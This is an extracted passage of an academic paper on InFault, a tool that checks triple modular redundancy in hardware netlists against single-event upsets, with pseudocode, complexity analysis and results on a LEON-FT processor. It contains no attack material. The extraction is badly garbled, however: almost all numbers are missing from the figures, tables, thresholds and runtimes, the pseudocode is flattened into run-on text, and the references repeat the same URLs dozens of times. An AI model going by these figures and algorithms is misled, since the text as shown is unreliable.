nodes x,y ∈ v output : number of matching configurations ∈ n if pre f fs(x) ≠ pre f fs(y) then return ; end mark graph(x); (v ,...,vk) ←find marked(y, x); count ← ; foreach c ∈config(v ,...,vk) do for i ← to k do value(vi)← ci; end if eval(x) = eval(y) then count ← count + ; end end return count; algorithm : functionally identical(x,y) input : a node x ∈ v input : a node marker ∈ v last visit(x) ← marker ; if is f f (x) then return; else foreach child ∈pre(x) do mark graph(child, marker); end end algorithm : mark graph() input : a node x ∈ v input : a node marker ∈ v output : a set of nodes (r ,...,rn),ri ∈ v if last visit(x) ≠ marker then return ∅; else result set ← (x); foreach child ∈pre(x) do rek ←find marked(child, marker); result set ← result set ∪ rek; end return result set; end algorithm : find marked() it is worth noting that the worst case scenario for this fast heuristic, i.e., when all ffs are reported as false positives, is when both subgraphs share only the driving ffs and the whole subgraph is duplicated. this is unlikely to happen when analyzing real world netlists, because synthesizers optimize away most redundant parts and introduce redundancy only in rare cases. for the designs used in this work, the non-shared subgraph size is typically less than nine gates as shown by fig. . beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. tmr structure analysis before starting the analysis, we optimize our description by removing non-relevant elements, as one-to-one buffer gates. as such buffers do not manipulate the logic value of a signal, it is easy to see that the logic functions are not changed when they are removed. if the tmr implementation were working correctly, a single bit-flip in one ff should not cause another ff to change its value. if a faulty triplicated ff/voter pair exists, there is at least one ff whose value can be changed by a single bit-flip in another ff. this is true only if the configuration before the bit-flip injection was a valid configuration. the algorithm tries to find such ffs, and if none are found, tmr is correctly implemented. the main idea of the test algorithm is that complexity can be reduced by checking only small submodules instead of the whole system. in order to do this, we observe that a bit-flip in one ff can only distribute to the next ff during the current clock cycle. it is then possible to determine the set of all ffs which could potentially influence a given ff x ∈ vff , i.e., pre f fs(x), i.e., the ffs driving x’s logic cone. the algorithm takes each ff xi and determines the set of ffs that driving its logic cone, and tests every possible bit flip for every possible valid configuration. if any of these bit flips is able to change xi stored value, then the algorithm detected a fault in the tmr implementation. more formally, algorithm describes this behavior in pseudocode (where abort interrupts execution and shows a message to the user). as the analysis function : analyze(x) input : a node x ∈ v (y ,...,yk) ←pre f fs(x); foreach valid c ∈config(y ,...,yk) do for i ← to k do value(yi)← ci; end init value ← evalff (x); foreach -bit mutation c′ of c do for i ← to k do value(yi)← c ′ i ; end mut value ← eval(x); if mut value ≠ init value then abort(ff x sensitive to seus); end end end algorithm : analyze(x) has to be performed for all x ∈ vff , analysis times might be excessively long. to reduce runtime, this algorithm has to be extended to handle large sets of driving ffs (y ,...,yk). if the number of elements t =|pre f fs(x)| in such a set exceeds a given threshold, the graph will be split into smaller subgraphs until the threshold is reached, as outlined in ‘splitting algorithm’. splitting algorithm analyzing typical designs with the proposed algorithm showed that the majority of ffs are driven by a very small set of ffs pre f fs(x) (typically less than , see fig. ). however beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. there are a few ffs that are driven by a large number of ffs (for some designs or more). those subgraphs cannot be analyzed directly as they require n configurations to be evaluated, and heuristics have to be devised. a naive approach would use “divide et impera,” splitting every node where |pre f fs(yi)| > threshold, starting from the ff to be analyzed. it is worth noting that the count from algorithm is not what is used here as a threshold. here we consider only the number of driving flip-flops, and not the number of matching configurations between two logic cones. this approach works for most ffs but fails if the synthesizer merged a voter with other logic during optimization. as an example, a -or gate of a voter might be merged with a following or gate into a -or gate. splitting could break the voter and result in a false positive alert. function : split analyze(x) input : a node x ∈ v split required ← false; foreach child ∈pre(x) do if |pre f fs(child)| > threshold then replace input(x, child, dummy); split analyze(child); split required ← true; end end if split required then (d ,...,dk) ←get dummynodes(x); foreach c ∈config(d ,...,dk) do for i ← to k do value(di)← ci; end analyze(x); end else analyze(x); end algorithm : split analyze(x) let childi be the nodes connected to the inputs of node x. to avoid breaking voting logic, instead of splitting using the threshold only, the originating node is kept and the subgraphs for the nodes childi with |pre f fs(childi)| > threshold are replaced by dummy input nodes (alg. , lines – ). every node childi is tested recursively according to algorithm with the divide et impera approach. afterwards, all possible bit configurations are assigned to the dummy inputs connected to x (lines – ). analyzing x for such configurations ensures that x is tested for all possible substates previously generated by the removed nodes childi. it is worth noting that this heuristic relies on the fact that synthesizers tend to keep the voting logic close to the originating ffs, and therefore splitting subgraphs with a large number of inputs usually does not result in voters to be broken. however, it cannot be excluded that some voting logic might be broken, resulting in some rare false positive alerts (see ‘experimental results’). this will never hide any seu sensitive parts: if tmr is not properly implemented, this will be detected. in case the beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure a shared reset line in a tmr triplet might cause issues in case of transients as two ffs might be affected simultaneously. algorithm reports a seu-sensitive ff, testing with a higher threshold value or manual inspection can identify if it represents a false positive. clock and reset tree verification verifying that the voters are correctly performing their task is not sufficient to guarantee that tmr structures are working. one also needs to show that transient errors on clock and reset lines are not affecting more than one ff at a time. figure shows how a shared reset line might result in seu-like behavior, as a transient on the line affects more than one ff. this could happen if the ffs shared a common asynchronous reset or clock line: in this case, a bit flip might zero the entire triplet, or force the ffs to sample the wrong value. to guarantee that tmr structures are functioning, it is then necessary to rule out this possibility. using the detected triplets, it is possible to verify that ffs belonging to the same triplet do not share the same clock and reset lines. this is a simple structural analysis that does not require an heuristic to be performed. algorithm complexity analysis given m =|v|and n =|vff|, being the total number of gates and ffs, respectively, a naive exhaustive search would result in n possible ff configurations to test, requiring o(m n) node evaluations. determining a subgraph to be analyzed for every node x ∈ vff , gives n subgraphs to verify. using the properties presented in ‘tmr structure analysis’, the algorithm has to check px =|pre f fs(x)| ffs, with typical designs showing that in general px ≪ n. as described in ‘tmr structure analysis’, the algorithm limits px to a given threshold t by splitting the graph into subgraphs. therefore, there are less than t valid configurations we have to evaluate for every subgraph (assuming ff triplication, we expect less than t valid beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table runtime comparison between ft-unshades and infault with thresholds and . times in minutes (m), hours (h), and days (d). testcase # gatesa # ffs ft-ub time infault time (th- ) infault time (th- ) fpc resetgen h < m < m pci mas , d h < m m pci tar , d h < m m mctrl , , d h m m fpu , , d h m m amod , , d h m m iu , , d h m m pci , , d h m m notes. a gatecount after mapping library to standard logic cells. b not exhaustive. c false positives, same results for both thresholds. configurations). as we are testing one bit-flip at a time, we need to perform t injections on every valid configuration. obviously, the number of subgraphs obtained after splitting and their sizes cannot exceed the total number of gates m, resulting in less than n · t · t ·m subgraph evaluations. overall, the algorithm performs o(nm ) node evaluations, showing polynomial behavior and outperforming other exponential verification methods. experimental results the algorithm presented in ‘tmr structure analysis’ was implemented as a c++ program called infault. the graph is obtained in two steps: first a given verilog netlist is converted into an intermediate file format, which is then read and analyzed by infault. this separation makes the parser independent from the main program, allowing easy development of parsers for different input files. the graph itself was implemented in a custom structure, using pointers whenever possible and stl (silicon graphics, ) maps, vectors, and sort algorithms to maximize speed. in order to be asic library independent, the parser is able to read library cell definitions and design netlists, and to map all custom asic cells to standard gates (and, or, . . . ). if the asic library makes use of non-standard cells, the parser and infault can be easily enhanced. the tool requires no user input during runtime, and shows status information like the overall progress, which gate is being processed, etc. the implementation was tested on the submodule netlists of a radiation-hardened leon -ft processor (gaisler, ). table shows the results of our tests with a threshold of and , and compares the runtime with the expected runtime of ft-unshades (aguirre et al., ). all tests were performed on a . ghz intel core duo workstation. although ft-unshades is not designed for full test coverage, table gives an idea of the performance of the algorithm over a brute force approach. it is worth noting that infault does not need a testbench for providing results, since it performs a static analysis of the leon -ft gate-level netlist. however, to compare our results with ft-unshades, we had to select a set of benchmarks. the runtime for the ft-unshades test beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. # of fa ls e po si tiv es threshold false positives ru nt im e (h ) threshold runtime figure runtime and false positive count with increasing threshold. was calculated based on measurements on smaller tests, using a testbench with , clock cycles and injecting in every possible ff, assuming a faster-than-real ms runtime for each test. these testbenches come directly from gaisler research, and are made with high code-coverage in mind. therefore, they were considered as a good choice to stimulate every part of the processor. it is worth noting that this short testbench duration cannot cover all possible internal substates therefore resulting in a non-exhaustive test. a testbench that covers all internal substates is hard or even impossible to find and the simulation time would be so high to render the analysis impractical. comparing infault to an exhaustive approach, for example for the pci submodule, we have that this module is verified in less than · · · ≈ . · node evaluations (threshold t = ). a naive approach would require · ≈ . · evaluations, showing that infault provides orders of magnitude of speedup. as the actual runtime of infault depends on the choice of the threshold presented in ‘splitting algorithm,’ we tested several threshold values to determine the speed of the algorithm. in general, smaller thresholds result in shorter runtimes with the drawback of more false positive alerts because of voters that have been broken during subgraph splitting. false positives have to be analyzed by manual graph inspection, or with other means. figure shows how overall runtime and number of false positives vary with increasing threshold, for all nine netlists of the leon -ft processor, with a total ffs and gates. the sum of false positives for all nine given designs goes from down to . the overall runtime goes from min up to h. for a suggested threshold of , the runtime is around min. please note that the runtime strongly correlates to the internal structure of the design, especially the subgraph sizes, and therefore it is subject to fluctuations among the designs. to show the effectiveness of the subgraph splitting, the algorithm was tested on the nine netlists, logging the different subgraph sizes before and after splitting (with beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. - - - - - - > co un t #of driving ffs per subgraph before splitting after splitting figure size classification of subgraphs before and after splitting. threshold = ). figure shows the results of this test. before splitting, there are , subgraphs that consist of > driving gates. assuming correct triplication this would result in more than valid configurations to be checked for each of those nodes, making the splitting heuristic an essential component of our approach. in fact, after splitting the situation is completely different: even though the splitting results in many more subgraphs to be checked, the subgraph sizes are much smaller. there are no subgraphs with more than driving gates, giving no more than valid configurations. it is worth noting that the results depend on the complexity of the circuit, since the splitting algorithm effectiveness varies by the number of driving ffs. infault might not have the same performance with other processors with very complex multi-layer logic. to show its fault detecting capabilities, infault was verified on a netlist (module iu in table ) with broken voters. the netlist used for this test consists of , triplets ( ffs). for the test run triplets were automatically selected, and their voters manipulated by changing the voter function from f (x ,x ,x ) = (x ∧x )∨(x ∧x )∨(x ∧x ) to f (x ,x ,x ) = x ∨x ∨x . this should result in n = · seu-sensitive ffs being detected. infault reported problems in n = · ffs: all unprotected triplets plus one false positive. finally, the methodology was applied to a production netlist of the leon -ft processor that reported failures due to seus after manufacturing, during a radiation test campaign. the algorithm reported common reset lines for triplicated ffs. an seu on these lines is consistent with the behaviour shown by the processor during radiation testing. these errors were introduced by the automated tools in charge of inserting tmr structures in the leon -ft processor, during the optimization phase. after correcting the netlist, with the proposed methodology reporting no remaining issue, the processor was irradiated further. radiation beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. tests showed no additional problems due to the tmr implementation, so that we can reasonably assume that the flip-flops were the cause of the initial testing issues. conclusions & future work in this work we presented an algorithm to verify tmr implementation for given netlists. performing exhaustive verification without the need of a testbench, this approach does not suffer from the quality and coverage of the given testbench as in other solutions. first results show that exhaustive tmr verification of production-ready netlists can be carried out within few hours. to the best of the authors’ knowledge, no other approach provides this kind of performance. future work includes replacing the actual simulation/injection step with the identifica- tion of triplets followed by formal verification of the correct propagation of flip-flop values through the voting logic. acknowledgements the author would like to thank simon schulz and david merodio-codinachs for the help provided in the development of infault. additional information and declarations funding the author received no funding for this work. competing interests the author declares there are no competing interests. author contributions • giovanni beltrame conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding the availability of data: http://github.com/mistlab/infault. references aguirre m, tombs jn, baena-lecuyer v, muñoz f, torralba a, fernández-león a, tortosa-lópez f. . ft-unshades: a new system for seu injection, analysis and diagnostics over post synthesis netlist. in: mapld’ , nasa military and aerospace programmable logic devices. available at http://klabs.org/mapld /abstracts/ aguirre a. html. boué j, pétillon p, crouzet y. . mefisto-l: a vhdl-based fault injection tool for the experimental assessment of fault tolerance. in: fault-tolerant computing, . digest of papers. beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://github.com/mistlab/infault http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://klabs.org/mapld /abstracts/ _aguirre_a.html http://dx.doi.org/ . /peerj-cs. twenty-eighth annual international symposium on, vol., no., – june . piscataway: ieee computer society, doi . /ftcs. . . carmichael c. . xapp : triple module redundancy design techniques for virtex fpgas. san jose: xilinx inc. available at http://www.xilinx.com/support/documentation/application notes/ xapp .pdf. gaisler j. . the leon ieee- (sparc v ) processor. available at http://www.gaisler.com. goswami kk, iyer rk, young l. . depend: a simulation-based environment for system level dependability analysis. ieee transactions on computers ( ): – doi . / . . habinc s. . functional triple modular redundancy. technical report. göteborg: gaisler research. available at http://www.gaisler.com/doc/fpga - - .pdf. kanawati g, abraham j. . ferrari: a flexible software-based fault and error injection system. ieee transactions on computers : – doi . / . . maestro ja. . sst . : user manual. universidad antonio de nebrija. available at http://www. nebrija.es/∼jmaestro/esa/docs/sst-usermanual - .pdf. seshia sa, li w, mitra s. . verification-guided soft error resilience. in: proceedings of the de- sign automation and test in europe (date). piscataway: ieee doi . /date. . . silicon graphics. . standard template library, sgi [online]. milpitas: silicon graphics. available at http://www.sgi. com/tech/stl. thornton m, drechsler r, gunther w. . a method for approximate equivalence checking. in: proceedings of the th ieee international symposium on multiple-valued logic. portland, or. piscataway: ieee, – . beltrame ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ftcs. . http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.xilinx.com/support/documentation/application notes/xapp .pdf http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://www.gaisler.com http://dx.doi.org/ . / . http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://www.gaisler.com/doc/fpga_ _ - - .pdf http://dx.doi.org/ . / . http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://www.nebrija.es/~jmaestro/esa/docs/sst-usermanual - .pdf http://dx.doi.org/ . /date. . http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://www.sgi. com/tech/stl http://dx.doi.org/ . /peerj-cs. triple modular redundancy verification via heuristic netlist analysis introduction previous work proposed approach mathematical model triplet identification tmr structure analysis clock and reset tree verification algorithm complexity analysis experimental 